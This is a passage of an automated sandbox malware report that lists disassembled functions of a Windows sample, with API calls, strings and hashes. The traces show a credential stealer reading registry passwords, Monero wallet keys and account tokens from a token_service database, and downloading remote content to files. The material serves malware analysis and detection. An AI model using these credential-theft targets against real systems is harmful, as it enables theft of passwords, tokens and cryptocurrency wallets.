                            • Opcode Fuzzy Hash: 9e17343302716bf393d6886787d20b1f12be9005a54ad7f5eea6bbb1b45b40f4
                            • Instruction Fuzzy Hash: 355122B195011A57CB55FB60EC95EEE773CBBD4300F408198B60E62081EE345B89DFA6
                            Function 005675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 005672D0: memset.MSVCRT ref: 00567314
                              • Part of subcall function 005672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0056733A
                              • Part of subcall function 005672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005673B1
                              • Part of subcall function 005672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0056740D
                              • Part of subcall function 005672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00567452
                              • Part of subcall function 005672D0: HeapFree.KERNEL32(00000000), ref: 00567459
                            • lstrcat.KERNEL32(00000000,005817FC), ref: 00567606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00567648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0056765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0056768F
                            • lstrcat.KERNEL32(00000000,00581804), ref: 005676A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005676D3
                            • lstrcat.KERNEL32(00000000,00581808), ref: 005676ED
                            • task.LIBCPMTD ref: 005676FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 334f200fcdbf78635d0bde45b0179f9b3faa92f7fe042b8bff953f3e00f9a132
                            • Instruction ID: 5bba719e01f441918d990953ca7f163f97435a783ead2c567fbe66a170d15a37
                            • Opcode Fuzzy Hash: 334f200fcdbf78635d0bde45b0179f9b3faa92f7fe042b8bff953f3e00f9a132
                            • Instruction Fuzzy Hash: 85315E7190010AEBCB49EBB4DC99DFE7B79BB89301B148518F102A7291DB38A946CF56
                            Function 005672D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00567314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0056733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005673B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0056740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00567452
                            • HeapFree.KERNEL32(00000000), ref: 00567459
                            • task.LIBCPMTD ref: 00567555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 79aafc5b58d24ee84c4682c1499920f1be2cafe40c2d9e2c9c7dd9d882cfd51a
                            • Instruction ID: 56f4ffca9e2159099a1e1c29b76a24be4610f9af05ae45c93ffcf0c889d54f22
                            • Opcode Fuzzy Hash: 79aafc5b58d24ee84c4682c1499920f1be2cafe40c2d9e2c9c7dd9d882cfd51a
                            • Instruction Fuzzy Hash: 53614BB590411D9BDB24DB50CC59BEABBB8BF98304F0085E9E649A7141DF705BC9CFA0
                            Function 00578100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E4E038,00000000,?,00580E2C,00000000,?,00000000), ref: 00578130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00578137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00578158
                            • __aulldiv.LIBCMT ref: 00578172
                            • __aulldiv.LIBCMT ref: 00578180
                            • wsprintfA.USER32 ref: 005781AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 603a2af2d1c77c3e27f4869d44ceee5961ec7316f32a7f6d7182b7387d59c8c6
                            • Instruction ID: 444b9a34199c0a91f571d9833f5acdab441b8b3bd8091d2dbba7ea3077ce05d4
                            • Opcode Fuzzy Hash: 603a2af2d1c77c3e27f4869d44ceee5961ec7316f32a7f6d7182b7387d59c8c6
                            • Instruction Fuzzy Hash: AE21EFB1D44259ABDB00DFD4DC49FAEBB78FB44B10F108519F619BB280D7786901CBA5
                            Function 005660A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                            • InternetOpenA.WININET(00580DF7,00000001,00000000,00000000,00000000), ref: 0056610F
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0056618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005661B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 005661DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0056620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00566249
                            • InternetCloseHandle.WININET(?), ref: 00566253
                            • InternetCloseHandle.WININET(00000000), ref: 00566260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 869b1b56c31be48adeca8e2bf3db97c536b438016efdd74cc0996d074149d66c
                            • Instruction ID: 9db64f930f92f3c62a5f4f49ab5341ce3a978954fbd319d657f337ee0f22cffe
                            • Opcode Fuzzy Hash: 869b1b56c31be48adeca8e2bf3db97c536b438016efdd74cc0996d074149d66c
                            • Instruction Fuzzy Hash: DB5163B1900218ABDB20DF50DC59BEE7BB8FB85701F108098B609A71C1DB756A89CF96
                            Function 005740B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 005740D5
                            • RegOpenKeyExA.ADVAPI32(80000001,00E4D6C0,00000000,00020119,?), ref: 005740F4
                            • RegQueryValueExA.ADVAPI32(?,00E4E278,00000000,00000000,00000000,000000FF), ref: 00574118
                            • RegCloseKey.ADVAPI32(?), ref: 00574122
                            • lstrcat.KERNEL32(?,00000000), ref: 00574147
                            • lstrcat.KERNEL32(?,00E4E3F8), ref: 0057415B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID: x
                            • API String ID: 2623679115-2890206012
                            • Opcode ID: 095c2c8507f64b2b14aa66efc8287c18db731cc93884c4d332bc05d29367cc30
                            • Instruction ID: d2459a279197c7e4f2b8d23eca3c49a920b8a1993f9dc66a7d8d8e07237a8b02
                            • Opcode Fuzzy Hash: 095c2c8507f64b2b14aa66efc8287c18db731cc93884c4d332bc05d29367cc30
                            • Instruction Fuzzy Hash: 814187B69001087BDB14EBA0EC4AFFE773DB7D9300F04C959B61A57181EA755B88CB92
                            Function 0056BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0056BC9F
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0056BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0056BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0056BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 3cae5295e5ad23f81512f660f862678d8fe9dc580c85fb860afbc0ec5a2fbe2a
                            • Instruction ID: 25279bd69ea375c8fd29b05173a476c3d7cc291f8fae0513ba2b2a032175d6b0
                            • Opcode Fuzzy Hash: 3cae5295e5ad23f81512f660f862678d8fe9dc580c85fb860afbc0ec5a2fbe2a
                            • Instruction Fuzzy Hash: 16B11371910105ABDB04FBA0ED5AEEE7B3CBFD4300F408558F50AA7091EF346A59DB66
                            Function 00576770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 6eb36be2f593020e9f1712c6631be9e4f3c457970e739f9da3d08613f229b99b
                            • Instruction ID: d8823564143bfb8b7464b6e0fc92d0cd12a97481d3782157391c37d75159822d
                            • Opcode Fuzzy Hash: 6eb36be2f593020e9f1712c6631be9e4f3c457970e739f9da3d08613f229b99b
                            • Instruction Fuzzy Hash: E9F05E3290421AFFD3849FE0E90977D7B70FB46703F048198E60986290D7784F41EB9A
                            Function 00564FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00564FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00564FD1
                            • InternetOpenA.WININET(00580DDF,00000000,00000000,00000000,00000000), ref: 00564FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00565011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00565041
                            • InternetCloseHandle.WININET(?), ref: 005650B9
                            • InternetCloseHandle.WININET(?), ref: 005650C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 12729e104061d239631c165b799f3eaa21314c1ef1cf1a56880e2f5105a2399d
                            • Instruction ID: 827423e218f0f4630e4e54dcac8ecb4a2dfd5b50649fea14cdad27d921fef26d
                            • Opcode Fuzzy Hash: 12729e104061d239631c165b799f3eaa21314c1ef1cf1a56880e2f5105a2399d
                            • Instruction Fuzzy Hash: 1F31FAB4A40218ABDB20CF54DC89BDDB7B4FB48704F5081D9EA09A7281D7746AC5CF99
                            Function 005783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00578426
                            • wsprintfA.USER32 ref: 00578459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0057847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0057848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00578499
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,00E4DF78,00000000,000F003F,?,00000400), ref: 005784EC
                            • lstrlen.KERNEL32(?), ref: 00578501
                            • RegQueryValueExA.ADVAPI32(00000000,00E4E110,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00580B34), ref: 00578599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00578608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0057861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 0f74d2c99e9fb5e0d79a2920ecc8b27c56280adbc7b4163e0b1ac72aab1c60f3
                            • Instruction ID: 1501ee387fcaa821ac314ea89b9e6281a887c4c182b26123f8c47be931985d37
                            • Opcode Fuzzy Hash: 0f74d2c99e9fb5e0d79a2920ecc8b27c56280adbc7b4163e0b1ac72aab1c60f3
                            • Instruction Fuzzy Hash: A921E97195021CABDB64DB54DC85FE9B7B8FB88700F00C5D8E609A6180DF756A85CFD4
                            Function 00577690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005776A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005776AB
                            • RegOpenKeyExA.ADVAPI32(80000002,00E3C470,00000000,00020119,00000000), ref: 005776DD
                            • RegQueryValueExA.ADVAPI32(00000000,00E4DF60,00000000,00000000,?,000000FF), ref: 005776FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00577708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
